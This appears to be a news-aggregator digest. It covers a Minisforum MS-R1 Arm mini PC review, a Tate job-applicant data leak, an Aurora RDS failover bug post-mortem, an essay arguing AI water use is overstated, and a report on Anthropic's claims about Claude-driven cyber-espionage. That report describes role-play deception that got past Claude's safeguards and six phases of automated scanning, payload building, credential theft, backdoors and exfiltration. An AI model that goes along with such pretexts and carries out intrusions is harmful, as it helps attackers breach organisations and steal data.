It looks great on my desk, it's quiet, it uses a 19V 180W power adapter (which is a bit chunky, but par for the course with Minisforum PCs), and overall, the hardware is some of the nicest of any Arm system, outside Apple's walled garden.

And the way you get inside is simple: press a little button and slide the chassis out of the shell (see photo above).

Minisforum MS-R1 U.2 adapter in WiFi card slot

It came with adapters for a U.2 drive (see above) or a second M.2 drive, which replace the built-in Mediatek WiFi card.

And yes, the unit I'm testing is a review unit sent by Minisforum. They did not pay me to test the machine, write this blog post, nor did they have any input into its contents.

Cix SoC - iGPU and a Big/Medium/Little Arm CPU

Now, let's dive into why this machine puzzles me, starting with the iGPU. Using Minisforum's default Debian 12 install, I could run glmark2 , and it performed well, scoring 6322, far above something like a Raspberry Pi 5 (which got 1935).

But Vulkan support was iffy. vulkaninfo Segfaulted, and vkmark wouldn't run at all.

But GravityMark did. And while the G720 won't bring home any awards , it's about on par with the Adreno 750 in Qualcomm's Snapdragon 8 cx Gen 3 .

That's the chip Microsoft used in their 'Project Volterra' 2023 Windows Arm Dev Kit.

And that's not the only similarity between the two.

Geekbench 6 scores were also pretty close , coming in at 1336 single core, and 6773 multicore.

Minisforum Geekbench 6 Arm benchmark MS-R1

That soundly beats SBCs like the Pi 5 or a Rockchip. But it's still well under Apple's four-year-old M1.

In other benchmarks, this thing is all over the place. I have two theories about that, which I'll get to.

But in real-world use, it does feel fast. At least, faster than any Arm SBC. You can actually watch 4K video on YouTube while you do other things, which is kind-of a novelty on anything that's not Qualcomm or Apple.

More testing revealed some oddities, though.

Consider my Top500 High Performance Linpack benchmark . This is a massive CPU stress test, great for testing memory access, too.

I played around with 4 cores, 8 cores, all 12 cores , and even limited the amount of RAM I was testing, because the results I was getting were confusing.

In the end, after some help from GitHub user @volyrique , we found the Cix P1 SoC is affected by the same BLIS issue other chips like the Nvidia GB10 'Superchip' and cloud chips using Neoverse N2 CPU cores run into: Poor DGEMM performance for armsve build on Neoverse N2 .

We're diving a bit deep here, but with newer SVE technology (vs. Arm's more traditional NEON 128 bit SIMD ), chips can use arbitrary vector lengths. The BLIS library optimizes newer chips with an armsve configuration, which assumes 256+ bit vector lengths, and is not optimized at all for 128-bit vector lengths (used by the Cix P1 in the Orion O6 and Minisforum MS-R1).

All that out of the way , I have deleted the section of the video embedded above covering HPL entirely, and have updated my benchmark graphs below:

Minisforum HPL graph with other Arm systems

The MS-R1 with it's 64 GB of RAM edged out my Orion O6 (I have the 16 GB model...), though it is less than half as performant as the M4 Mac mini.

Not a bad showing, overall, and after adjusting the HPL configuration to account for the instruction set mismatch, I was able to get a score almost triple that of the fastest small Arm SBCs'.

Energy efficiency is a step down, though—it's not the worst, and certainly, under load , it is better than most Intel/AMD systems:

Minisforum HPL graph - efficiency

But the efficiency story is much worse considering the idle power draw:

Minisforum MS-R1 - Idle power draw

Unless you are running large workloads constantly, this machine will end up using far more energy than other Arm solutions (especially Apple's M-series Macs), due to the high idle power.

But why is it so high ? This is a graph of core to core memory latency, showing how fast it is for different CPU cores to share memory on the system. Honestly, this isn't horrible , especially when I pair it with raw memory access speed:

Minisforum c2clat Cix SoC Arm

Minisforum MS-R1 Memory Access benchmark

The MS-R1's RAM is pretty fast (though notably slower than the O6, which directly impacts performance with tasks like AI inference).

But I think the strange CPU core layout is causing power problems; Radxa and Minisforum both told me Cix is working on power draw, and enabling features like ASPM .

It seems like for stability, and to keep memory access working core to core, with the big.medium.little CPU core layout, Cix wants to keep the chip powered up pretty high. 14 to 17 watts idle is beyond even modern Intel and AMD!

For networking, the onboard NICs provide a full 10 gigs, and the built-in WiFi 6E was good for a gigabit on my network.

And with 64 gigs of RAM, one thing this box could excel at compared to an SBC is local AI, even if it's just on the CPU.

I ran a bunch of different models that would fit in the memory, and here are those results:

Minisforum MS-R1 AI CPU benchmarks vs Arm systems

This is one place where it actually underperforms the older Orion O6 with the same CPU, which is directly related to the slower RAM speeds.

Efficiency

The performance inconsistency is puzzling, but the power consumption is really what hurts the most—that's an area Arm is supposed to shine in. But it goes to show you, CPU core architecture and even process nodes aren't everything when it comes to effiency. Design matters.

Apple's M-series puts everything to shame, but even taking that out of the mix, it's not quite what I'd expect from 2025 Arm CPU design.

Despite all that, it's quiet and the fans keep it cool. The performance profile ramps up the fans to 100%, but that didn't make much difference in real-world performance except making it about 50 dBa from a foot away instead of 40 dBa in the normal profile.

Dedicated GPU Upgrade

If you're thinking about loading up AI models, or even modest gaming, a dedicated GPU will get you a lot further than the iGPU.

Minisforum added ventilation holes across the entire top, so a modded GPU like the Abovetop RTX A2000 , with 8 gigs of VRAM, will fit and get adequate cooling. Similar to older MS-** Minisforum workstations, this machine only fits half-height single-slot PCI Express cards, and ones that are not too long at that.

Installation is easy, though finicky due to the tight spaces. You unscrew and pull a small retention clip out, remove the slot cover, and fit the new card. It rests on a small foam spacer to isolate the card from the motherboard.

Minisforum MS-R1 rear with Nvidia RTX A2000 installed

Booting the computer back up, I saw the card using lspci , so Linux can see it. But I wasn't able to install the drivers on the Debian 12 OS image shipped with the machine. I also tried an Intel Arc A310 ECO , a lower-specced and smaller single-slot card, but that wasn't even recognized when I ran lspci .

For the Intel card, it's probably just a signaling issue, though—I'm not going to hold it against the MS-R1 since I've had issues with the A310 ECO on other systems.

BIOS detour

I'll get back to A2000 testing, but these experiments took me on a detour into the BIOS.

Minisforum MS-R1 Cix BIOS screen

There are settings for USB, RAM, power on behavior, and a lot more. It's pretty complete, but I still see a lot of things labeled 'Beta', so keep that in mind if you buy one of these things.

One thing I tested that didn't work is the AC Power Loss setting. You're supposed to be able to tell it to turn on when power is restored—that's great for something like a homelab. But the BIOS setting didn't do anything. I remembered seeing a hardware switch on the board, though, and sure enough! That's how you actually control the AC power loss setting.

Switching to Ubuntu

Getting back to the A2000, I decided to switch gears and try Ubuntu from an Arm ISO install via USB flash drive. The process was easy enough (I didn't have to change anything in the BIOS), and Ubuntu installed without a hitch.

The A2000's drivers were automatically installed, and I was off to the races.

AI is obviously faster on the GPU (total system power draw was around 94W):

Minisforum MS-R1 AI benchmark on RTX A2000

And GravityMark, a good proxy for how games will run on a given GPU, ran fine too, increasing the score over the iGPU from 3,037 to 16,679 .

Conclusion

Having a full PCI Express slot in here is nice. Coupled with the extra included U.2 and M.2 adapters, it's clear Minisforum thinks of this thing as a good homelab box. They even published guides for installing Proxmox (a community maintained version) and Jellyfin with iGPU acceleration. Considering expansion-options-per-cubic meter, this has all other Arm machines beat, including the Mac mini.

Honestly, this works fine as an Arm desktop, certainly better than any SBC. But Intel and AMD exist, and so does Apple, for that matter, and that makes this a bad value where it stands today , in the $500-600 range. Unless you're an Arm enthusiast, you should save some money and get a different mini PC—even one of Minisforum's other MS-series desktops . Or if you can afford $600 bucks, buy the best value Arm desktop on the market, the M4 Mac mini . Of course, that thing can't run bare metal Linux , so take that into account.

I like that it exists. And I like that Cix and Minisforum are trying to shake up the Arm desktop market a bit. But it's still half-baked:

  • Can performance and power issues be fixed in firmware?
  • Will they get all the drivers mainlined so all features work in every Linux distro?
  • Windows can run on here, but will Nvidia ever release GPU drivers for Windows on Arm?

I'm not sure. But I will try gaming in Linux on here soon, and some other tests. So make sure you follow this blog's RSS feed or subscribe over on YouTube , if you want to follow along!

You can buy the Minisforum MS-R1 from Minisforum's online store, starting around $500 at the time of this writing.

stickertop.art

Lobsters
stickertop.art
2025-11-14 18:38:46
Comments...
Original Article

Jack

26 min read

Welcome to stickertop.art

Discover a unique collection of laptops adorned with creative stickers from around the world.

This project celebrates the art and culture of laptop personalization each laptop tells a story through its stickers and gives us a glimpse of the personality of the owners.

Personal details of Tate galleries job applicants leaked online

Guardian
www.theguardian.com
2025-11-14 18:38:03
Sensitive information relates to more than 100 individuals and their referees Personal details submitted by applicants for a job at Tate art galleries have been leaked online, exposing their addresses, salaries and the phone numbers of their referees, the Guardian has learned. The records, running t...
Original Article

Personal details submitted by applicants for a job at Tate art galleries have been leaked online, exposing their addresses, salaries and the phone numbers of their referees, the Guardian has learned.

The records, running to hundreds of pages, appeared on a website unrelated to the government-sponsored organisation, which operates the Tate Modern and Tate Britain galleries in London, Tate St Ives in Cornwall and Tate Liverpool.

The data includes details of applicants’ current employers and education, and relates to the Tate’s hunt for a website developer in October 2023. Information about 111 individuals is included. They are not named but their referees are, sometimes with mobile numbers and personal email addresses. It was not immediately clear how long the data had been circulating online.

Max Kohler, a 29-year-old computer programmer, discovered his data appeared in the leak on Thursday after one of the referees on his application was emailed by a stranger who had seen the data dump online.

Kohler found that it included his last salary, the name of his current employer, and names, emails and addresses of his other referees, as well as lengthy answers he had given to job application questions.

“It’s very disappointing and disillusioning,” he said. “You spend time putting in all this sensitive information, salaries from previous jobs, home addresses, and they don’t take care of this information, and have it floating around in public.

“They should take it down, apologise and there should be a report into how this happened and what they are going to do to ensure it does not happen again. It must be mistrained staff or process error.”

The number of data security incidents reported to the UK’s Information Commissioner’s Office (ICO) continues to rise . In 2022 there were just over 2,000 incidents reported per quarter; that has increased to more than 3,200 between April and June this year.

Kate Brimsted, a partner at the law firm Shoosmiths and an expert in data privacy, information law and cyber security, said: “A breach doesn’t have to be deliberate, and while the ransomware attacks get the headlines, the majority of breaches today are through error. It’s just as important to have checks and processes as part of organisations’ day-to-day practices. We are all fallible. It’s really hard work managing your own data. It is difficult and sometimes boring, but is important.”

The ICO, which regulates data protection in the UK, said: “Organisations must notify the ICO within 72 hours of becoming aware of a personal data breach, unless it does not pose a risk to people’s rights and freedoms. If an organisation decides that a breach doesn’t need to be reported they should keep their own record of it and be able to explain why it wasn’t reported if necessary.”

skip past newsletter promotion

A spokesperson for Tate said: “We review all reports thoroughly and are investigating the matter. We have not identified any breach of our systems and wouldn’t comment further while the matter is ongoing.”

Quick Guide

Contact us about this story

Show

The best public interest journalism relies on first-hand accounts from people in the know.

If you have something to share on this subject, you can contact us confidentially using the following methods.

Secure Messaging in the Guardian app

The Guardian app has a tool to send tips about stories. Messages are end to end encrypted and concealed within the routine activity that every Guardian mobile app performs. This prevents an observer from knowing that you are communicating with us at all, let alone what is being said.

If you don't already have the Guardian app, download it ( iOS / Android ) and go to the menu. Select ‘Secure Messaging’.

SecureDrop, instant messengers, email, telephone and post

If you can safely use the Tor network without being observed or monitored, you can send messages and documents to the Guardian via our SecureDrop platform .

Finally, our guide at theguardian.com/tips lists several ways to contact us securely, and discusses the pros and cons of each.

Illustration: Guardian Design / Rich Cousins

AI World Clocks

Hacker News
clocks.brianmoore.com
2025-11-14 18:35:22
Comments...
Original Article

×

Every minute, a new clock is displayed that has been generated by nine different AI models.

Each model is allowed 2000 tokens to generate its clock. Here is its prompt:

Create HTML/CSS of an analog clock showing ${time}. Include numbers (or numerals) if you wish, and have a CSS animated second hand. Make it responsive and use a white background. Return ONLY the HTML/CSS code with no markdown formatting.

Created by Brian Moore . You can also follow him on Instagram . Idea inspired by Matthew Rayfield .

Anthropic claims of Claude AI-automated cyberattacks met with doubt

Bleeping Computer
www.bleepingcomputer.com
2025-11-14 18:31:16
Anthropic reports that a Chinese state-sponsored threat group, tracked as GTG-1002, carried out a cyber-espionage operation that was largely automated through the abuse of the company's Claude Code AI model. [...]...
Original Article

Malicious artificial Intelligence

Anthropic reports that a Chinese state-sponsored threat group, tracked as GTG-1002, carried out a cyber-espionage operation that was largely automated through the abuse of the company's Claude Code AI model.

However, Anthropic's claims immediately sparked widespread skepticism, with security researchers and AI practitioners calling the report " made up " and accusing the company of overstating the incident.

Others argued the report exaggerated what current AI systems can realistically accomplish.

Wiz

"This Anthropic thing is marketing guff. AI is a super boost but it's not skynet, it doesn't think, it's not actually artificial intelligence (that's a marketing thing people came up with)," posted cybersecurity researcher Daniel Card .

Much of the skepticism stems from Anthropic providing no indicators of compromise (IOCs) behind the campaign. Furthermore, BleepingComputer's requests for technical information about the attacks were not answered.

Claims attacks were 80-90% AI-automated

Despite the criticism, Anthropic claims that the incident represents the first publicly documented case of large-scale autonomous intrusion activity conducted by an AI model.

The attack, which Anthropic says it disrupted in mid-September 2025, used its Claude Code model to target 30 entities, including large tech firms, financial institutions, chemical manufacturers, and government agencies.

Although the firm says only a small number of  intrusions succeeded, it highlights the operation as the first of its kind at this scale, with AI allegedly autonomously conducting nearly all phases of the cyber-espionage workflow.

"The actor achieved what we believe is the first documented case of a cyberattack largely executed without human intervention at scale—the AI autonomously discovered vulnerabilities… exploited them in live operations, then performed a wide range of post-exploitation activities," Anthropic explains in its report .

"Most significantly, this marks the first documented case of agentic AI successfully obtaining access to confirmed high-value targets for intelligence collection, including major technology corporations and government agencies."

Attack architecture
Attack architecture
Source: Anthropic

Anthropic reports that the Chinese hackers built a framework that manipulated Claude into acting as an autonomous cyber intrusion agent, instead of just receiving advice or using the tool to generate fragments of attack frameworks as seen in previous incidents .

The system used Claude in tandem with standard penetration testing utilities and a Model Context Protocol (MCP)-based infrastructure to scan, exploit, and extract information without direct human oversight for most tasks.

The human operators intervened only at critical moments, such as authorizing escalations or reviewing data for exfiltration, which Anthropic estimates to be just 10-20% of the operational workload.

The attack was conducted in six distinct phases, summarized as follows:

  • Phase 1 – Human operators selected high-value targets and used role-playing tactics to deceive Claude into believing it was performing authorized cybersecurity tasks, bypassing its built-in safety restrictions.
  • Phase 2 – Claude autonomously scanned network infrastructure across multiple targets, discovered services, analyzed authentication mechanisms, and identified vulnerable endpoints. It maintained separate operational contexts, allowing parallel attacks without human oversight.
  • Phase 3 – The AI generated tailored payloads, conducted remote testing, and validated vulnerabilities. It created detailed reports for human review, with humans only stepping in to approve escalation to active exploitation.
  • Phase 4 – Claude extracted authentication data from system configurations, tested credential access, and mapped internal systems. It independently navigated internal networks, accessing APIs, databases, and services, while humans authorized only the most sensitive intrusions.
  • Phase 5 – Claude used its access to query databases, extract sensitive data, and identify intelligence value. It categorized findings, created persistent backdoors, and generated summary reports, requiring human approval only for final data exfiltration.
  • Phase 6 – Throughout the campaign, Claude documented each step in a structured format, including discovered assets, credentials, exploit methods, and extracted data. This enabled seamless handoffs between threat actor teams and supported long-term persistence in compromised environments.
Phases of the attack
Phases of the attack
Source: Anthropic

Anthropic further explains that the campaign relied more on open-source tools rather than bespoke malware, demonstrating that AI can leverage readily available off-the-shelf tools to conduct effective attacks.

However, Claude wasn’t flawless, as, in some cases, it produced unwanted “hallucinations,” fabricated results, and overstated findings.

Responding to this abuse, Anthropic banned the offending accounts, enhanced its detection capabilities, and shared intelligence with partners to help develop new detection methods for AI-driven intrusions.

Wiz

The 2026 CISO Budget Benchmark

It's budget season! Over 300 CISOs and security leaders have shared how they're planning, spending, and prioritizing for the year ahead. This report compiles their insights, allowing readers to benchmark strategies, identify emerging trends, and compare their priorities as they head into 2026.

Learn how top leaders are turning investment into measurable impact.

We Uncovered a Race Condition in Aurora RDS

Hacker News
hightouch.com
2025-11-14 18:20:08
Comments...
Original Article

Much of the developer world is familiar with the AWS outage in us-east-1 that occurred on October 20th due to a race condition bug inside a DNS management service. The backlog of events we needed to process from that outage on the 20th stretched our system to the limits, and so we decided to increase our headroom for event handling throughput. When we attempted that infrastructure upgrade on October 23rd, we ran into yet another race condition bug in Aurora RDS. This is the story of how we figured out it was an AWS bug (later confirmed by AWS) and what we learned.

Background

The Hightouch Events product enables organizations to gather and centralize user behavioral data such as page views, clicks, and purchases. Customers can setup syncs to load events into a cloud data warehouse for analytics or stream them directly to marketing, operational, and analytics tools to support real-time personalization use cases.

Here is the portion of Hightouch’s architecture dedicated to our events system:

A diagram showing the architecture of Hightouch's events system

Hightouch events system architecture

Our system scales on three levers: Kubernetes clusters that contain event collectors and batch workers, Kafka for event processing, and Postgres as our virtual queue metadata store.

When our pagers went off during the AWS outage on the 20th, we observed:

  • Services were unable to connect to Kafka brokers managed by AWS MSK.
  • Services struggled to autoscale because we couldn’t provision new EC2 nodes.
  • Customer functions for realtime data transformation were unavailable due to AWS STS errors, which caused our retry queues to balloon in size.

Kafka’s durability meant that no events were dropped once they were accepted by the collectors, but there was a massive backlog to process. Syncs with consistently high traffic or with enrichments that needed to call slower 3rd party services took longer to catch up and were testing the limits of our (small) Postgres instance’s ability to act as a queue for the batch metadata.

As an aside, at Hightouch, we start with Postgres where we can . Postgres queues serve our non-events architecture well at ~1M syncs/day and for events scaled to 500K events per second at ~1s end-to-end latency on a small Aurora instance.

After observing the events on the 20th, We wanted to upsize the DB to give us more headroom. Given that Aurora supports fast failovers for scaling up instances, we decided to proceed with an upgrade on Oct 23rd without a scheduled maintenance window.

AWS Aurora RDS

The central datastore for real-time streaming and warehouse delivery of customer events uses Amazon Aurora PostgreSQL .

Aurora's architecture differs from traditional PostgreSQL in a crucial way: it separates compute from storage. An Aurora cluster consists of:

  • One primary writer instance that handles all write operations
  • Multiple read replica instances that handle read-only queries
  • A shared storage layer that all instances access, automatically replicated across multiple availability zones

This architecture enables fast failovers and efficient read scaling, but as we'd discover, it also introduces unique failure modes.

A failover is the process of promoting a read replica to become the new primary writer - typically done automatically when the primary fails, or manually triggered for maintenance operations like ours. When you trigger a failover in the AWS console:

  1. Aurora designates a read replica as the new primary
  2. The storage layer grants write privileges to the new primary
  3. The cluster endpoint points to the new writer
  4. The old primary becomes a read replica (if it's still healthy)

The diagram below explains how Hightouch Events uses Aurora.

A diagram showing how Hightouch Events uses Aurora

How Hightouch Events uses Aurora

The Plan

This was our upgrade plan:

  1. Add another read replica (instance #3) to maintain read capacity during the upgrade.
  2. Upgrade the existing reader (instance #2) to the target size and give it the highest failover priority.
  3. Trigger a failover to promote instance #2 as the new writer (expected downtime less than 15s, handled gracefully by our backend).
  4. Upgrade the old writer (instance #1) to match the size and make it a reader.
  5. Remove the temporary extra reader (instance #3).

The AWS docs supported this approach and we had already tested the process successfully in a staging environment while performing a load test, so we were confident in the correctness of the procedure.

The Upgrade Attempt

At 16:39 EDT on October 23, 2025, we triggered the failover to the newly-upgraded instance #2. The AWS Console showed the typical progression: parameter adjustments, instance restarts, the usual status updates.

Then the page refreshed. Instance #1 - the original writer was still the primary. The failover had reversed itself .

According to AWS everything was healthy. The cluster appeared healthy across the board. But our backend services couldn't execute write queries. Restarting the services cleared the errors and restored normal operation, but the upgrade had failed.

We tried again at 16:43. Same result: brief promotion followed by immediate reversal.

Two failed failovers in five minutes . Nothing else had changed - no code updates, no unusual queries, no traffic spikes. We had successfully tested this exact procedure in a staging environment under load earlier in the day. We checked our process to see if we had made any mistakes. We searched online to see if anyone else had encountered this issue but found nothing. Nothing obvious could explain why Aurora was refusing to complete the failover in this cluster. We were perplexed.

The Investigation

We first checked database metrics for anything unusual. There was a spike in connection count, network traffic, and commit throughput to the read replica (instance #2) during the failover.

The higher commit throughput could have been due to replication or the execution of write queries. The other two metrics simply indicated a higher query volume.

We checked the read query traffic from the app (graph below), and found that there was no change during this period. This told us the extra traffic to instance #2 came from our backend services which are supposed to connect to the writer instance.

A graph showing the query traffic from the Hightouch app

Query traffic from the Hightouch app

When we looked at the backend application logs, we found this error - DatabaseError: cannot execute UPDATE in a read-only transaction in some pods.

A list of backend application logs

Backend application logs

Our services do not connect directly to the writer instance, but rather to a cluster endpoint which points to the writer. This could mean one of 3 things:

  1. The pods did not get the signal that the writer had changed - i.e. the cluster did not terminate the connection.
  2. The cluster endpoint incorrectly pointed to a reader instance.
  3. The pod was connected to the writer, but the write operation was rejected at runtime.

We did not find any evidence supporting or disproving #1 in the application logs. We had a strong suspicion it was either #2 or #3. We downloaded the database logs to take a closer look and found something interesting. In both the promoted reader and the original writer, we found the same sequence of logs:

2025-10-23 20:38:58 UTC::@:[569]:LOG:  starting PostgreSQL...
...
...
...
LOG:  database system is ready to accept connections
LOG:  server process (PID 799) was terminated by signal 9: Killed
DETAIL:  Failed process was running: <write query from backend application>
LOG:  terminating any other active server processes
FATAL:  Can't handle storage runtime process crash
LOG:  database system is shut down

This led us to a hypothesis:

During the failover window, Aurora briefly allowed both instances to process writes. The distributed storage layer rejected the concurrent write operations, causing both instances to crash.

We expect Aurora’s failover orchestration to do something like this:

  1. Stop accepting new writes. Clients can expect connection errors until the failover completes.
  2. Finish processing in-flight write requests.
  3. Demote the writer and simultaneously promote the reader.
  4. Accept new write requests on the new writer.

There was clearly a race condition between steps 3 & 4.

Testing the Hypothesis

To validate the theory, we performed a controlled failover attempt. This time:

  1. We scaled down all services that write to the database
  2. We triggered the failover again
  3. We monitored for storage runtime crashes

By eliminating concurrent writes , the failover completed successfully. This strongly reinforced the race-condition hypothesis.

AWS Confirms the Root Cause

We escalated the findings and log patterns to AWS. After an internal review, AWS confirmed that:

The root cause was due to an internal signaling issue in the demotion process of the old writer, resulting in the writer being unchanged after the failover.

They also confirmed that there was nothing unique about our configuration or usage that would trigger the bug . The conditions that caused it were not under our control.

AWS has indicated a fix is on their roadmap, but as of now, the recommended mitigation aligns with our solution: use Aurora’s Failover feature on an as-needed basis and ensure that no writes are executed against the DB during the failover.

Final State

With the race condition understood and mitigated, we:

  • Successfully upsized the cluster in us-east-1
  • Updated our internal playbooks to pause writers before an intentional failover
  • Added monitoring to detect any unexpected writer role advertisement flips

Takeaways

The following principles were reinforced during this experience:

  1. Prepare for the worst in any migration - you could end up in your desired end state, beginning state, or an in-between state - even for services you trust. Ensuring you’re ready to redirect traffic and handle brief outages in dependencies will minimize downtime.
  2. The importance of good observability cannot be emphasized enough. The “brief writer advertisement” was only detectable because we were monitoring queries to each instance in Datadog and had access to database logs in RDS.
  3. For large scale distributed systems, isolating the impact any single component can have on the system can help both uptime and maintenance. It helps a lot if the design allows for such events without completely shutting down the system.
  4. Test setups are not always representative of production environments. Even though we practiced the upgrade process during a load test in a staging region, we could not reproduce the exact conditions that caused the race condition in Aurora. AWS confirmed that there was nothing specific about our traffic pattern that would trigger it.

If challenges like this investigation sound interesting, we encourage you to check out our careers page

Show HN: Dumbass Business Ideas

Hacker News
dumbassideas.com
2025-11-14 18:18:11
Comments...
Original Article

Want your REAL product featured here? Submit for review!

Dumbass

Business Ideas

The world's finest collection of terrible entrepreneurship

100% terrible zero exit strategy

Using any of these ideas for anything other than entertainment purposes is a SIN 😈

Curating your next bad idea...

Approvals for new dumbass ideas may take up to 12 hours
(our quality control team is very busy not doing their job 🫠)

The AI water issue is fake

Lobsters
andymasley.substack.com
2025-11-14 17:56:12
Comments...
Original Article

AI data centers use water. Like any other industry that uses water, they require careful planning. If an electric car factory opens near you, that factory may use just as much water as a data center . The factory also requires careful planning. But the idea that either the factory or AI is using an inordinate amount of water that merits any kind of boycott or national attention as a unique serious environmental issue is innumerate. On the national, local, and personal level, AI is barely using any water, and unless it grows 50 times faster than forecasts predict, this won’t change. I’m writing from an American context and don’t know as much about other countries. But at least in America, the numbers are clear and decisive.

The idea that AI’s water usage is a serious national emergency caught on for three reasons:

  • People get upset at the idea of a physical resource like water being spent on a digital product, especially one they don’t see value in, and don’t factor in just how often this happens everywhere.

  • People haven’t internalized how many other people are using AI. AI’s water use looks ridiculous if you think of it as a small marginal new thing. It looks tiny when you divide it by the hundreds of millions of people using AI every day.

  • People are easily alarmed by contextless large numbers, like the number of gallons of water a data center is using. They compare these large numbers to other regular things they do, not to other normal industries and processes in society.

Together, these create the impression that AI water use is a problem. It is not. Regardless of whether you love or hate AI, it is not possible to actually look at the numbers involved without coming to the conclusion that this is a fake problem. This problem’s hyped up for clicks by a lot of scary articles that completely fall apart when you look at the simple easy-to-access facts on the ground. These articles have contributed to establishing fake “common wisdom” among everyday people that AI uses a lot of water.

This post is not at all about other issues related to AI, especially the very real problems with electricity use. I want to give you a complete picture of the issue. I think AI and the national water system are both so wildly interesting that they can be really fun to read about even if you’re not invested in the problem.

All U.S. data centers (which mostly support the internet, not AI) used 200–250 million gallons of freshwater daily in 2023. The U.S. consumes approximately 132 billion gallons of freshwater daily. The U.S. circulates a lot more water day to day, but to be extra conservative I’ll stick to this measure of its consumptive use, see here for a breakdown of how the U.S. uses water . So data centers in the U.S. consumed approximately 0.2% of the nation’s freshwater in 2023. I repeat this point a lot , but Americans spend half their waking lives online . A data center is just a big computer that hosts the things you do online . Everything we do online interacts with and uses energy and water in data centers. When you’re online, you’re using a data center as you would a personal computer. It’s a miracle that something we spend 50% of our time using only consumes 0.2% of our water.

However, the water that was actually used onsite in data centers was only 50 million gallons per day , the rest was used to generate electricity offsite. Most electricity is generated by heating water to spin turbines, so when data centers use electricity, they also use water. Only 0.04% of America’s freshwater in 2023 was consumed inside data centers themselves. This is 3% of the water consumed by the American golf industry .

How much of this is AI? Probably 20% . So AI consumes approximately 0.04% of America’s freshwater if you include onsite and offsite use, and only 0.008% if you include just the water in data centers.

So AI, which is is now built into every facet of the internet that we all use for 7 hours every single day, that includes the most downloaded app for the 7 months straight , that also includes many normal computer algorithms beyond chatbots, and that so many people around the world are using that Americans only make up 16% of the user base , is using 0.008% of America’s total freshwater. This 0.008% is approximately 10,600,000 gallons of water per day.

I’m from a town of 16,000 people. It looks like this:

All AI in all American data centers is collectively using 8 times as much water as the local water utility in my town provides to consumers . 1 You should be exactly as worried about AI’s current national water usage as you would be if you found out that 8 additional towns of 16,000 people each were going to be built around the country.

Here’s data center water use compared to a lot of other American industries:

And here’s a comparison to how much water different American agricultural products use, the main way water is used in America:

Forecasts imply that American data center electricity usage could triple by 2030 . Because water use is approximately proportionate to electricity usage, this implies data centers themselves may consume 150 million gallons of water per day onsite, 0.12% of America’s current freshwater consumption.

So the water all American data centers will consume onsite in 2030 is equivalent to:

If you found out that U.S. steel production was expected to increase by 8% in 2030, the amount that would cause you to worry about water is how worried you should be about data center water usage by 2030.

How much of this will be AI? Almost all this growth will be driven by AI, but because AI is only 20% of data center power use, its growth will have to be huge to triple total power usage. One forecast says AI energy use in America will be multiplied by 10 by 2030 . Because water use is proportionate to energy use, we can multiply AI’s water use by 10 as well.

So in 2030, AI in data centers specifically will be using 0.08% of America’s freshwater. This means it will rise to the level of 5% of America’s current water used on golf courses, or 5% of U.S. steel production, or be about 173 square miles of irrigated corn farms.

The average American’s consumptive lifestyle freshwater footprint is 422 gallons per day . This means that in 2023, AI data centers used as much water as the lifestyles of 25,000 Americans, 0.007% of the population. By 2030, they might use as much as the lifestyles of 250,000 Americans, 0.07% of the population. Not nothing, but 250,000 people over 5 years is just 4% of America’s current rate of population growth . If you found out that immigration plus new births in America would increase by 4% of its current rate, would you first thought be “We can’t afford that, it’s way too much water”?

This is more contentious, but all this is in the context of AI potentially boosting U.S. and global GDP by whole percentage points. Most forecasts imply that AI will boost total U.S. GDP by at least 1% . If we judge industries by how much they’re contributing, data center direct onsite usage will collectively be 0.08% of consumption by 2030, but contributing at least 1% to GDP. Maybe this won’t happen, but in worlds where this doesn’t happen, AI companies won’t be able to afford a huge buildout either. If AI is a bubble, the bubble will have to pop sometime before AI data center water usage hits 10x what it currently is in America. Your predictions for how much water AI will use and your predictions for how much real economic value it’s going to provide have to be related in some way.

Because data centers are using the same normal amounts of water as many other industries, there are no places (so far) where it seems like data centers have raised water costs at all or harmed local water access. I have a much longer deep dive on that here . I won’t repeat all the arguments. If you’re skeptical, I’d suggest reading that first.

The only exceptions to this rule are the construction of data centers, which has in a few place caused issues for local groundwater. This is bad, but it’s purely an issue of constructing a large building. It has nothing to do with AI specifically, for the same reason that debris from a bank being constructed would tell you nothing about how banks normally impact a community. There’s a famous New York Times headline that comes up in most conversations of AI and water use:

But the reason their taps ran dry (which the article itself says) was entirely because of sediment buildup in groundwater from construction. It had nothing to do with the data center’s normal operations (it hadn’t begun operating yet, and doesn’t even draw from local groundwater ). The residents were wronged by Meta here and deserve compensation, but this is not an example of a data center’s water demand harming a local population.

Basically every single news story that’s broken about this has been misleading for similar really simple reasons it’s easy to cross check and verify. I’ve written up my issues with most major news coverage of AI water below . You don’t have to take my word for it, you can look at each one and see if I’m right or wrong for yourself.

The Georgia data center is only using ~2% of the county’s water . For comparison, a pharmaceutical manufacturing plant is using ~4% of the county’s water . A construction plant for Rivian cars is using about the same amount of water as Meta’s data center . The data center is functioning like any other normal industry in the county.

No matter where you look, whether it’s the place with the highest percentage of local water going to data centers ( the Dalles, Oregon ) or the place with the most water in total going to data centers ( Loudoun County, Virginia ) or the place with the highest water stress where lots of new data centers are being built ( Maricopa County, Arizona ), data centers are not negatively impacting local’s freshwater access at all, because they are behaving like any normal private industry. You can follow each link in the parentheses for a breakdown of how that county uses water and how data centers affect them.

The only difference is that data centers contribute way way way more tax revenue per unit of water used than most other industries. Take Maricopa County in Arizona. The county is home to Phoenix, and is in a desert where water is pumped in from elsewhere. It’s also one of the places in the country where the most new data centers are being built .

Circle of Blue , a nonprofit research organization that seems generally trusted, estimates that data centers in Maricopa County will use 905 million gallons of water in 2025 . For context, Maricopa County golf courses use 29 billion gallons of water each year . In total, the county uses 2.13 billion gallons of water every day, or 777 billion gallons every year. Data centers make up 0.12% of the county’s water use. Golf courses make up 3.8%.

Data centers are so much more efficient with their water that they generate 50x as much tax revenue per unit of water used than golf courses in the county:

So even though data centers are using 30x less water than golf courses, they bring in more total tax revenue: 2

Some people see this, and react with something like “Well I don’t think golf courses OR data centers should be built in the desert.” At some point this becomes an argument against anyone living in deserts in the first place. If you want to have a gigantic city in the desert, like Phoenix, that city needs some way of supporting itself with taxes, and giving jobs to the people who live there. Most industries use significant amounts of water. If Phoenix is going to exist, it’s going to need private industries built around it that are using some water. We have two options here:

  • Build industries that generate huge amounts of tax revenue relative to the water they use. Data centers fall into this category (though they don’t provide many jobs).

  • Do not build cities in the desert in the first place.

Arguments against data centers existing in the desert because they harm water systems there also often apply to building cities in the desert in the first place. It’s fine and consistent to say that Phoenix shouldn’t exist because it’s unnaturally pumping water from hundreds of miles away, but it’s inconsistent to say that Phoenix should exist, that its water bills should be kept as low as possible, but also that no industries that use any water should be built there.

